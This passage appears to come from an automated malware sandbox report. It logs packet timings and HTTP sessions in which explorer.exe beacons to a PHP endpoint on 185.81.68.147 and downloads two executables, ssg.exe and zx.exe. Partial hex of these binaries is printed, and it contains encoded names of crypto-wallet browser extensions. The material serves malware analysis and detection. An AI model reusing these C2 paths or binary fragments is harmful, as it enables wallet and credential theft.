                                                                                                                                                                                                                      Dec 17, 2024 10:16:48.107633114 CET8049768185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.322870970 CET8049768185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.322949886 CET8049768185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.323044062 CET4976880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.324441910 CET4976880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.426645994 CET4976980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.444358110 CET8049768185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.546636105 CET8049769185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.546920061 CET4976980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.546920061 CET4976980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.666810989 CET8049769185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.667061090 CET4976980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.787028074 CET8049769185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.006777048 CET8049769185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.008104086 CET4976980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.032883883 CET8049769185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.032978058 CET4976980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.114401102 CET4977080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.127886057 CET8049769185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.234180927 CET8049770185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.234304905 CET4977080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.234385014 CET4977080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.354115009 CET8049770185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.354208946 CET4977080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.473983049 CET8049770185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:52.681742907 CET8049770185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:52.681981087 CET8049770185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:52.682065010 CET4977080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:52.697501898 CET4977080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:52.801904917 CET4977180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:52.817390919 CET8049770185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:52.922234058 CET8049771185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:52.922322989 CET4977180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:52.922429085 CET4977180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:53.042359114 CET8049771185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:53.042423964 CET4977180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:53.190177917 CET8049771185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.355576992 CET8049771185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.355747938 CET8049771185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.355803013 CET4977180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.357048988 CET4977180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.473601103 CET4977280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.476797104 CET8049771185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.593614101 CET8049772185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.593719006 CET4977280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.593786955 CET4977280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.713571072 CET8049772185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.713641882 CET4977280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.833498001 CET8049772185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.037787914 CET8049772185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.037827969 CET8049772185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.037949085 CET4977280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.039288044 CET4977280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.145457029 CET4977380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.159126043 CET8049772185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.266237974 CET8049773185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.266391039 CET4977380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.266467094 CET4977380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.386564970 CET8049773185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.386661053 CET4977380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.506490946 CET8049773185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:57.877729893 CET8049773185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:57.877840042 CET8049773185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:57.877902031 CET4977380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:57.879890919 CET4977380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:57.994005919 CET4977480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:58.000853062 CET8049773185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:58.113895893 CET8049774185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:58.114037037 CET4977480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:58.114125013 CET4977480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:58.233855963 CET8049774185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:58.234004974 CET4977480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:58.353764057 CET8049774185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:59.714562893 CET8049774185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:59.714651108 CET8049774185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:59.714725018 CET4977480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:59.716077089 CET4977480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:59.817270041 CET4977580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:59.835793018 CET8049774185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:59.937098980 CET8049775185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:59.937203884 CET4977580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:59.937259912 CET4977580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:17:00.057075024 CET8049775185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:17:00.057138920 CET4977580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:17:00.176959038 CET8049775185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:17:01.412868977 CET8049775185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:17:01.412945032 CET8049775185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:17:01.413001060 CET4977580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:17:04.638384104 CET4977580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:17:04.758138895 CET8049775185.81.68.147192.168.2.8

                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                      • 185.81.68.147

                                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      0192.168.2.849705185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:14:55.911230087 CET259OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.238166094 CET257INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:14:56 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 40
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Data Raw: 35 38 63 38 65 37 36 33 31 38 35 66 38 30 33 61 35 36 63 38 64 32 36 65 33 63 62 34 66 65 61 66 38 31 32 32 38 61 63 36
                                                                                                                                                                                                                      Data Ascii: 58c8e763185f803a56c8d26e3cb4feaf81228ac6


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      1192.168.2.849706185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.368565083 CET279OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 37
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.488604069 CET37OUTData Raw: 57 57 17 44 57 19 00 4f 00 08 49 56 44 00 4f 51 49 7e 36 7a 21 60 62 48 63 20 1e 5c 13 07 04 14 4c 4d 03 4e 01
                                                                                                                                                                                                                      Data Ascii: WWDWOIVDOQI~6z!`bHc \LMN
                                                                                                                                                                                                                      Dec 17, 2024 10:14:58.920505047 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:14:58 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      2192.168.2.849707185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:14:59.048096895 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:14:59.168984890 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:00.656069994 CET315INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:14:59 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 98
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Data Raw: 05 44 0b 4c 11 47 0c 1c 1e 09 0d 53 16 08 02 4f 03 0e 4d 09 50 05 19 16 40 04 4c 51 1e 00 6c 6c 08 4d 5a 46 4c 11 59 19 1a 09 5b 0d 4b 0f 07 1d 07 00 1b 57 0c 07 1c 1b 4d 18 06 40 01 3f 3c 54 4f 0b 16 40 16 5f 4e 49 09 09 07 1c 00 50 4d 00 0d 16 52 0c 52 18 43 43 55 59 41 03 16 55 4b 04 38 3c
                                                                                                                                                                                                                      Data Ascii: DLGSOMP@LQllMZFLY[KWM@?<TO@_NIPMRRCCUYAUK8<


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      3192.168.2.849708185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:00.778542995 CET232OUTGET /ssg.exe HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108469009 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:01 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      Last-Modified: Thu, 12 Dec 2024 10:50:51 GMT
                                                                                                                                                                                                                      ETag: "4b200-629107cd804d2"
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Content-Length: 307712
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH(0 @ @<O H.text `.rsrc @@.reloc@BpH (wautofill5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108506918 CET224INData Raw: 39 00 6c 00 61 00 47 00 78 00 6c 00 5a 00 6d 00 35 00 72 00 62 00 32 00 52 00 69 00 5a 00 57 00 5a 00 6e 00 63 00 47 00 64 00 72 00 62 00 6d 00 35 00 38 00 54 00 57 00 56 00 30 00 59 00 57 00 31 00 68 00 63 00 32 00 73 00 4b 00 59 00 57 00 5a 00
                                                                                                                                                                                                                      Data Ascii: 9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108517885 CET1236INData Raw: 39 00 6d 00 59 00 6d 00 52 00 6b 00 5a 00 32 00 4e 00 70 00 61 00 6d 00 35 00 74 00 61 00 47 00 35 00 6d 00 62 00 6d 00 74 00 6b 00 62 00 6d 00 46 00 68 00 5a 00 48 00 78 00 44 00 62 00 32 00 6c 00 75 00 59 00 6d 00 46 00 7a 00 5a 00 51 00 70 00
                                                                                                                                                                                                                      Data Ascii: 9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWht
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108580112 CET224INData Raw: 66 00 45 00 31 00 6c 00 64 00 30 00 4e 00 34 00 43 00 6d 00 35 00 68 00 62 00 6d 00 70 00 74 00 5a 00 47 00 74 00 75 00 61 00 47 00 74 00 70 00 62 00 6d 00 6c 00 6d 00 62 00 6d 00 74 00 6e 00 5a 00 47 00 4e 00 6e 00 5a 00 32 00 4e 00 6d 00 62 00
                                                                                                                                                                                                                      Data Ascii: fE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWln
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108594894 CET1236INData Raw: 66 00 46 00 4e 00 68 00 64 00 48 00 56 00 79 00 62 00 6c 00 64 00 68 00 62 00 47 00 78 00 6c 00 64 00 41 00 70 00 6d 00 62 00 6d 00 70 00 6f 00 62 00 57 00 74 00 6f 00 61 00 47 00 31 00 72 00 59 00 6d 00 70 00 72 00 61 00 32 00 46 00 69 00 62 00
                                                                                                                                                                                                                      Data Ascii: fFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcH
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108606100 CET1236INData Raw: 48 68 58 70 45 fd 19 8f de 6c 87 94 7b f8 b7 52 73 d3 23 ab 4b 02 e2 72 1f 8f 57 e3 55 ab 2a 66 eb 28 07 b2 b5 c2 03 2f c5 7b 9a 86 37 08 a5 d3 28 87 f2 30 bf a5 b2 23 03 6a ba 02 16 82 5c ed cf 1c 2b 8a 79 b4 92 a7 07 f2 f0 f3 69 e2 a1 4e da f4
                                                                                                                                                                                                                      Data Ascii: HhXpEl{Rs#KrWU*f(/{7(0#j\+yiNe4b.S4U2u9`@q^nQ!>=>FMT]qoP`$@CwgB[8y|GB|+H2pZrNl8V=-9'6d
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108617067 CET1236INData Raw: 6f 00 63 00 65 00 73 00 73 00 49 00 6e 00 66 00 6f 00 6f 00 63 00 65 00 73 00 73 00 20 00 57 00 68 00 65 00 72 00 65 00 20 00 53 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 49 00 6e 00 66 00 6f 00 65 00 73 00 73 00 69 00 6f 00 6e 00 49 00 64 00
                                                                                                                                                                                                                      Data Ascii: ocessInfoocess Where SProcessInfoessionId='cc||ww{{kkooTP`00gg}V++bMvvE@}}YYGGAg_E#Srr[u=jL&&Zl66A~?
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108769894 CET672INData Raw: 3b ab 6b cb 1f 9d 45 f1 ac fa 58 ab 4b e3 03 93 20 30 fa 55 ad 76 6d f6 88 cc 76 91 f5 02 4c 25 4f e5 d7 fc c5 2a cb d7 26 35 44 80 b5 62 a3 8f de b1 5a 49 25 ba 1b 67 45 ea 0e 98 5d fe c0 e1 c3 2f 75 02 81 4c f0 12 8d 46 97 a3 6b d3 f9 c6 03 8f
                                                                                                                                                                                                                      Data Ascii: ;kEXK 0UvmvL%O*&5DbZI%gE]/uLFk_mzRY-Xt!Ii)DujyxX>k'qO f}:cJ1Q3`bSEdwk+pHhXElR{s#rKWfU*(/{70(#j\
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108788967 CET1236INData Raw: f6 8d 13 c2 90 d8 b8 e8 2e 39 f7 5e 82 c3 af f5 9f 5d 80 be 69 d0 93 7c 6f d5 2d a9 cf 25 12 b3 c8 ac 99 3b 10 18 7d a7 e8 9c 63 6e db 3b bb 7b cd 26 78 09 6e 59 18 f4 ec 9a b7 01 83 4f 9a a8 e6 95 6e 65 aa ff e6 7e 21 bc cf 08 ef 15 e8 e6 ba e7
                                                                                                                                                                                                                      Data Ascii: .9^]i|o-%;}cn;{&xnYOne~!Jo6)|1*?#105ftN73JAP/vMCMMTLj,FeQ^5]tsA.gZRV3mGa7zY<'a5zG<
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108800888 CET1236INData Raw: 8a 85 0f 8a 70 90 e0 70 3e 42 7c 3e b5 c4 71 b5 66 aa cc 66 48 d8 90 48 03 05 06 03 f6 01 f7 f6 0e 12 1c 0e 61 a3 c2 61 35 5f 6a 35 57 f9 ae 57 b9 d0 69 b9 86 91 17 86 c1 58 99 c1 1d 27 3a 1d 9e b9 27 9e e1 38 d9 e1 f8 13 eb f8 98 b3 2b 98 11 33
                                                                                                                                                                                                                      Data Ascii: pp>B|>qffHHaa5_j5WWiX':'8+3"iip3-"< IUU(xP(zYe1BBhhAA)-wZ-{TTm:,Profile_FsbGV0CmZuamhta2
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.228593111 CET1236INData Raw: 52 00 6b 00 62 00 47 00 6c 00 6a 00 5a 00 33 00 42 00 75 00 66 00 46 00 42 00 68 00 62 00 47 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 59 00 57 00 39 00 6b 00 61 00 32 00 74 00 68 00 5a 00 32 00 35 00 68 00 5a 00 47 00 4e 00
                                                                                                                                                                                                                      Data Ascii: RkbGljZ3BufFBhbGlXYWxsZXQKYW9ka2thZ25hZGNib2JmcGdnZm5qZW9uZ2VtamJqY2F8Qm9sdFgKa3Bmb3BrZWxtYXBjb2lwZW1mZW5kbWRjZ2huZWdpbW58


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      4192.168.2.849709185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.335921049 CET231OUTGET /zx.exe HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677186012 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:03 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      Last-Modified: Sun, 15 Dec 2024 08:15:56 GMT
                                                                                                                                                                                                                      ETag: "5a4530-6294aac656b58"
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Content-Length: 5915952
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3c 90 5e 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 c5 45 [TRUNCATED]
                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEd<^g"(X@EZ`lx`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc@@.reloch@B
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677208900 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                      Data Ascii: H(/H'HHHHHH($HqCH\$Hl$ LD$VWATAUAWH H3HDIHA.LHuHVHM
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677226067 CET1236INData Raw: 48 83 c4 20 41 5f 41 5e 5e c3 8b 56 04 45 33 c0 48 03 93 00 10 00 00 49 8b cf e8 53 e5 00 00 85 c0 79 1c 4c 8d 46 12 48 8d 15 00 a4 02 00 48 8d 0d 35 a4 02 00 e8 a4 12 00 00 e9 bb 00 00 00 8b 4e 0c e8 a7 2c 01 00 4c 8b f0 48 85 c0 75 20 44 8b 4e
